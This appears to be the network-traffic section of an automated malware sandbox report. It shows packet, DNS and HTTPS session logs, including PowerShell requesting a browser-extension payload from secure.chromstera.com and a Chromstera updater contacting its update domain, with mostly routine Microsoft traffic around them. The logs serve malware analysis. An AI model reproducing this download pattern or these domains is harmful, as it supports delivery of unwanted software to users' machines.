                                                                                                                                                                            Oct 28, 2024 19:13:08.035670996 CET44354985162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.073163986 CET54985443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:08.912986994 CET54985443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:08.913583040 CET54985443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:08.914603949 CET57399443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:09.044794083 CET44354985162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.045643091 CET44354985162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.045939922 CET44354985162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.046117067 CET54985443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:09.229234934 CET57399443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:09.516971111 CET44357399162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.517033100 CET44357399162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.517070055 CET44357399162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.517106056 CET44357399162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.517647028 CET57399443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:09.519016027 CET57399443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:09.519016027 CET57399443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:09.519254923 CET57399443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:09.523359060 CET57399443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:09.643011093 CET44357399162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.643048048 CET44357399162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.643081903 CET44357399162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.643109083 CET44357399162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.643481970 CET57399443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:09.643481970 CET57399443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:09.644223928 CET44357399162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.647253036 CET44357399162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.648103952 CET44357399162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.648319006 CET57399443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:09.979228020 CET44357399162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.011090040 CET57399443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:10.027966976 CET44357399162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.057173967 CET57399443192.168.2.4162.159.61.3

                                                                                                                                                                            DNS Queries

                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                            Oct 28, 2024 19:11:31.024566889 CET192.168.2.41.1.1.10x38aStandard query (0)chromsterabrowser.comA (IP address)IN (0x0001)false
                                                                                                                                                                            Oct 28, 2024 19:11:31.031095028 CET192.168.2.41.1.1.10x5734Standard query (0)secure.chromstera.comA (IP address)IN (0x0001)false
                                                                                                                                                                            Oct 28, 2024 19:11:31.037179947 CET192.168.2.41.1.1.10xf77Standard query (0)chromsteraupdates.comA (IP address)IN (0x0001)false
                                                                                                                                                                            Oct 28, 2024 19:12:48.145174980 CET192.168.2.41.1.1.10xa913Standard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                            Oct 28, 2024 19:12:48.145471096 CET192.168.2.41.1.1.10xabb2Standard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                            Oct 28, 2024 19:12:51.605990887 CET192.168.2.41.1.1.10xf48cStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                            Oct 28, 2024 19:12:51.606127024 CET192.168.2.41.1.1.10xa8c4Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                            Oct 28, 2024 19:12:51.606563091 CET192.168.2.41.1.1.10xdf7bStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                            Oct 28, 2024 19:12:51.606736898 CET192.168.2.41.1.1.10x319fStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                            Oct 28, 2024 19:12:51.800295115 CET192.168.2.41.1.1.10xe8d4Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                            Oct 28, 2024 19:12:51.803967953 CET192.168.2.41.1.1.10x4d3dStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false

                                                                                                                                                                            DNS Answers

                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                            Oct 28, 2024 19:11:31.047364950 CET1.1.1.1192.168.2.40xf77No error (0)chromsteraupdates.com104.21.8.139A (IP address)IN (0x0001)false
                                                                                                                                                                            Oct 28, 2024 19:11:31.047364950 CET1.1.1.1192.168.2.40xf77No error (0)chromsteraupdates.com172.67.139.132A (IP address)IN (0x0001)false
                                                                                                                                                                            Oct 28, 2024 19:11:31.068006039 CET1.1.1.1192.168.2.40x5734No error (0)secure.chromstera.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                            Oct 28, 2024 19:11:31.068006039 CET1.1.1.1192.168.2.40x5734No error (0)secure.chromstera.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                            Oct 28, 2024 19:12:46.632594109 CET1.1.1.1192.168.2.40xe4cdNo error (0)svc.ha-teams.office.commira-tmc.tm-4.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                            Oct 28, 2024 19:12:48.152749062 CET1.1.1.1192.168.2.40xa913No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                            Oct 28, 2024 19:12:48.152749062 CET1.1.1.1192.168.2.40xa913No error (0)googlehosted.l.googleusercontent.com172.217.16.193A (IP address)IN (0x0001)false
                                                                                                                                                                            Oct 28, 2024 19:12:48.153633118 CET1.1.1.1192.168.2.40xabb2No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                            Oct 28, 2024 19:12:49.367346048 CET1.1.1.1192.168.2.40x262eNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                            Oct 28, 2024 19:12:49.367346048 CET1.1.1.1192.168.2.40x262eNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                            Oct 28, 2024 19:12:51.613410950 CET1.1.1.1192.168.2.40xf48cNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                            Oct 28, 2024 19:12:51.613410950 CET1.1.1.1192.168.2.40xf48cNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                            Oct 28, 2024 19:12:51.613573074 CET1.1.1.1192.168.2.40xa8c4No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                            Oct 28, 2024 19:12:51.614186049 CET1.1.1.1192.168.2.40x319fNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                            Oct 28, 2024 19:12:51.614321947 CET1.1.1.1192.168.2.40xdf7bNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                            Oct 28, 2024 19:12:51.614321947 CET1.1.1.1192.168.2.40xdf7bNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                            Oct 28, 2024 19:12:51.808140993 CET1.1.1.1192.168.2.40xe8d4No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                            Oct 28, 2024 19:12:51.808140993 CET1.1.1.1192.168.2.40xe8d4No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                            Oct 28, 2024 19:12:51.811233044 CET1.1.1.1192.168.2.40x4d3dNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false

                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                            • secure.chromstera.com
                                                                                                                                                                            • chromsteraupdates.com
                                                                                                                                                                            • slscr.update.microsoft.com
                                                                                                                                                                            • otelrules.azureedge.net
                                                                                                                                                                            • clients2.googleusercontent.com
                                                                                                                                                                            • edgeassetservice.azureedge.net
                                                                                                                                                                            • chrome.cloudflare-dns.com
                                                                                                                                                                            • msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com

                                                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            0192.168.2.449735188.114.97.34437964C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:11:31 UTC119OUTGET /cross/crx3dynamic/?adv=426&v=4.4&time=1730139128 HTTP/1.1
                                                                                                                                                                            Host: secure.chromstera.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            2024-10-28 18:11:32 UTC790INHTTP/1.1 404 Not Found
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:11:31 GMT
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y4g0jurbb%2FylK2vxdGNtVOvYJ6WuYmHIJDz157KP1iuDbj2hgY2dNAcVG1v85MCCMcU0hYATOIB9I3tzplk3I1Dg4PmrjZncSKwOyB6wlxUdmw34FPOLlgKRlbM8Xx1WKD%2BUSuEFMME%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                            CF-RAY: 8d9ce38bffc5e96a-DFW
                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1643&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=733&delivery_rate=1698533&cwnd=248&unsent_bytes=0&cid=2453cd3faa7abb50&ts=320&x=0"
                                                                                                                                                                            2024-10-28 18:11:32 UTC348INData Raw: 31 35 35 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e
                                                                                                                                                                            Data Ascii: 155<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
                                                                                                                                                                            2024-10-28 18:11:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            1192.168.2.449734104.21.8.1394438100C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:11:31 UTC160OUTGET /download/updates.txt HTTP/1.1
                                                                                                                                                                            Accept: */*
                                                                                                                                                                            User-Agent: AdvancedInstaller
                                                                                                                                                                            Host: chromsteraupdates.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            2024-10-28 18:11:31 UTC880INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:11:31 GMT
                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            ETag: "2817279164"
                                                                                                                                                                            Last-Modified: Sun, 27 Oct 2024 22:02:50 GMT
                                                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bJqGMYy%2BWwErS7TlJr3rcsmq9ZxXVpeel0Um3azP8yC%2FLQ%2FD43c5Ot5mxdu8l8vqTRoIJ6baLxPyTRjGMcaANLAn8MGcioq5dwq1f409oWhc0ubQLaVW8ZbjdbRfbXCXDpfHVcNYaxs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                            CF-RAY: 8d9ce38bfbf8e867-DFW
                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1454&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=774&delivery_rate=1991746&cwnd=251&unsent_bytes=0&cid=c9edb86717f60947&ts=271&x=0"


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            2192.168.2.4497364.245.163.56443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:11:38 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=pUkVGK2e4kgEmE9&MD=mNzcmBgT HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept: */*
                                                                                                                                                                            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                            Host: slscr.update.microsoft.com
                                                                                                                                                                            2024-10-28 18:11:38 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                            Expires: -1
                                                                                                                                                                            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                            ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                            MS-CorrelationId: a60a63cc-d162-438d-b310-b266c16d60a2
                                                                                                                                                                            MS-RequestId: bb5620ba-5c49-48b6-a6c0-ac7faa0b229e
                                                                                                                                                                            MS-CV: BV2u2RkShUuM9exh.0
                                                                                                                                                                            X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                            Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:11:38 GMT
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Length: 24490
                                                                                                                                                                            2024-10-28 18:11:38 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                            Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                            2024-10-28 18:11:38 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                            Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            3192.168.2.44975413.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:16 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:16 UTC561INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:16 GMT
                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                            Content-Length: 218853
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public
                                                                                                                                                                            Last-Modified: Sun, 27 Oct 2024 10:35:44 GMT
                                                                                                                                                                            ETag: "0x8DCF6731CF80310"
                                                                                                                                                                            x-ms-request-id: 89d6c6b8-201e-0033-2798-28b167000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181216Z-17fbfdc98bb9cv5m0pampz446s00000004sg00000000c8xv
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:16 UTC15823INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                                                            Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                                                                            2024-10-28 18:12:16 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                            Data Ascii: <S T="1" F="0" /> </L> <R> <V V="400" T="I32" /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L>
                                                                                                                                                                            2024-10-28 18:12:16 UTC16384INData Raw: 3c 53 20 54 3d 22 33 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 20 20 3c 53 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 53 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 38 32 30 76 33 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d
                                                                                                                                                                            Data Ascii: <S T="3" /> </T> <ST> <S T="1" /> </ST></R><$!#>10820v3+<?xml version="1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-
                                                                                                                                                                            2024-10-28 18:12:16 UTC16384INData Raw: 6e 74 73 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 36 34 22 20 49 3d 22 38 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 45 76 65 6e 74 73 5f 41 76 67 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 41 76 65 72 61 67 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a
                                                                                                                                                                            Data Ascii: nts" /> </C> <C T="U64" I="8" O="false" N="Events_Avg"> <S T="2" F="Average" /> </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" />
                                                                                                                                                                            2024-10-28 18:12:16 UTC16384INData Raw: 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20
                                                                                                                                                                            Data Ascii: </S> <C T="U32" I="0" O="false" N="Count_CreateCard_ValidPersona_False"> <C> <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32"
